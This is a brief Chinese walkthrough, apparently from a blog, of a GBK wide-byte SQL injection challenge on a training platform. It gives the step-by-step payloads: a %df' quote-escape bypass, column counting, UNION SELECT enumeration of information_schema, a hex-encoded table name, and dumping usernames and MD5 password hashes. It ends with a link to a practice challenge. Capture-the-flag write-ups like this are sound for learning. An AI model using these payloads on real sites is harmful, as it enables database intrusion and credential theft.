宽字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/宽字节注入/
先构造payload:%df'  报错,存在宽字节注入
然后加:%df' oder by 5--+或者%df' order by 5%23(#)
5不报错,6报错,所以只有6个字段,联合查询
id=-1%df' union select 1,2,3,4,5%23,发现3,5回显
墨者学院-SQL注入漏洞测试(宽字节)
id=-1%df' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()%23
墨者学院-SQL注入漏洞测试(宽字节)
猜测在第二个表里,由于单引号被转义,所以进行16进制编码(不带单引号),继续构造
id=-1%df' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x73746F726D67726F75705F6D656D626572%23
墨者学院-SQL注入漏洞测试(宽字节)
id=-1%df' union select 1,2,group_concat(name),4,group_concat(password) from stormgroup_member%23
墨者学院-SQL注入漏洞测试(宽字节)
把密码md5解密,一个一个试,也可以先把status爆出来,发现分别是0,1所以直接拿第二个登录,拿到key

 

这里提供一个CGctf平台宽字节注入练手的题目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

相关文章:

  • 2022-01-04
  • 2021-08-02
  • 2021-09-08
  • 2022-01-11
  • 2021-09-13
  • 2021-08-16
  • 2022-01-19
猜你喜欢
  • 2021-06-08
  • 2021-08-16
  • 2021-10-01
  • 2021-10-07
  • 2021-05-03
相关资源
相似解决方案